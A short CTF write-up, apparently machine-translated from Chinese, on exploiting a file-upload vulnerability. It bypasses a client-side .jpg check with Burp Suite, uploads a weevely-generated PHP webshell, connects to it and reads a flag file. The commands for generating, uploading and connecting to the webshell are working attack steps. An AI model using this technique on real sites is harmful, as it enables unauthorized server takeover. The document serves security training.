当前位置:网站首页>Upload vulnerability
Upload vulnerability
2022-07-06 09:52:00 【XRSec】
Upload the loopholes
First , The title is upload, Prompt is upload vulnerability does js Intercept , Code blocking , Look at the following Webpage head head , Find out js Code , keyword jpg
- burpsuite Grab the bag , Configure agent
- weevely Generate a sentence
weevely generate password ./1.php #use weevely Generate... In the current directory 1.php, password passwd mv 1.php 1.php.jpg
- Choose file upload && burpsuite Grab the bag Delete .jpg
- The echo upload success : upload/1592555994.1.php
- weevely Connect
weevely http://220.249.52.133:57535/upload/1592554838.1.php password # weevely Connect dir # Show directory cd ../.. Find out flag.php cat flag.php
obtain flag
边栏推荐
- Meituan Er Mian: why does redis have sentinels?
- 在CANoe中通过Panel面板控制Test Module 运行(初级)
- May brush question 27 - figure
- Some thoughts on the study of 51 single chip microcomputer
- Competition vscode Configuration Guide
- 【深度學習】語義分割-源代碼匯總
- Mapreduce实例(五):二次排序
- Mapreduce实例(七):单表join
- What you have to know about network IO model
- Safety notes
猜你喜欢
Embedded development is much more difficult than MCU? Talk about SCM and embedded development and design experience
CAPL 脚本对.ini 配置文件的高阶操作
大学C语言入门到底怎么学才可以走捷径
Use of activiti7 workflow
51单片机进修的一些感悟
【深度学习】语义分割:论文阅读(NeurIPS 2021)MaskFormer: per-pixel classification is not all you need
Mapreduce实例(十):ChainMapReduce
Keep these four requirements in mind when learning single chip microcomputer with zero foundation and avoid detours
发生OOM了,你知道是什么原因吗,又该怎么解决呢?
How can I take a shortcut to learn C language in college
随机推荐
[NLP] bert4vec: a sentence vector generation tool based on pre training
DCDC power ripple test
MapReduce working mechanism
How does the single chip microcomputer execute the main function from power on reset?
[deep learning] semantic segmentation: paper reading: (2021-12) mask2former
大学C语言入门到底怎么学才可以走捷径
How can I take a shortcut to learn C language in college
Compress decompress
Redis distributed lock implementation redison 15 questions
Interview shock 62: what are the precautions for group by?
嵌入式开发比单片机要难很多?谈谈单片机和嵌入式开发设计经历
[deep learning] semantic segmentation: paper reading: (CVPR 2022) mpvit (cnn+transformer): multipath visual transformer for dense prediction
CAPL脚本中关于相对路径/绝对路径操作的几个傻傻分不清的内置函数
Embedded development is much more difficult than MCU? Talk about SCM and embedded development and design experience
If a university wants to choose to study automation, what books can it read in advance?
CAP理论
手把手教您怎么编写第一个单片机程序
May brush question 27 - figure
机械工程师和电气工程师方向哪个前景比较好?
Compilation of libwebsocket